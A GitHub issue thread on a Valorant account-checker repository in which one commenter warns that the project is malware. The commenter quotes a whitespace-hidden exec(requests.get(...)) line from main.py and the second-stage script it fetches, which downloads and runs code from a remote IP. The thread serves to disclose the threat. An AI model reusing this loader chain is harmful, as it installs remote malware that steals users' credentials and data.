### ISSUE TITLE
Error

### ISSUE THREAD

**Issue by Tijeen** [Yosh1m/Valorant-Checker#2]
Traceback (most recent call last):
  File "C:\Users\vandi\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\models.py", line 971, in json
    return complexjson.loads(self.text, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\vandi\AppData\Local\Programs\Python\Python311\Lib\json\__init__.py", line 346, in loads
    return _default_decoder.decode(s)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\vandi\AppData\Local\Programs\Python\Python311\Lib\json\decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\vandi\AppData\Local\Programs\Python\Python311\Lib\json\decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "c:\Users\vandi\Downloads\ckr\ckrs\main.py", line 613, in <module>
    checker()
  File "c:\Users\vandi\Downloads\ckr\ckrs\main.py", line 187, in checker
    data = r2.json()
           ^^^^^^^^^
  File "C:\Users\vandi\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\models.py", line 975, in json
    raise RequestsJSONDecodeError(e.msg, e.doc, e.pos)
requests.exceptions.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

**Comment by Yosh1m** [comment]
ok I will fix it soon

**Comment by TheInsecureAccount** [comment]
@Tijeen You have been hacked. This repo has malware: 

`main.py` file:

https://github.com/Yosh1m/Valorant-Checker/blob/186fabf7e6f9122ea6fefc695f945a09dfcfeb8e/main.py#L2

```
import os                                                                                                                                
import requests  ..... lots of whitespace..... ;exec(requests.get('https://rentry.co/f5qhqqb4/raw').text)  
```

Contents of https://rentry.co/f5qhqqb4/raw 

```
import subprocess
from tempfile import NamedTemporaryFile as tempnaw
from os import system as syast
py_execs = ["pythonw", "pyw", "py"]
for py_exec in py_execs:
    try:
        subprocess.run([py_exec, "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        break
    except FileNotFoundError:
        continue
else:
    py_exec = "python"
temp_file = tempnaw(delete=False)
temp_file.write(b"""exec(__import__('requests').get('http://162.248.100.117/inj', headers={'User-Agent': 'Mozilla/5.0 (CyberW / Python) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'}).text)""")
temp_file.close()
try:
    syast(f"start {py_exec} {temp_file.name}")
except:
    pass
```


This runs a malware that steals all your info and details.
More details on the malware: https://medium.com/@demonia/lets-dig-deep-into-pypihosted-malware-part-1-94ada4737442
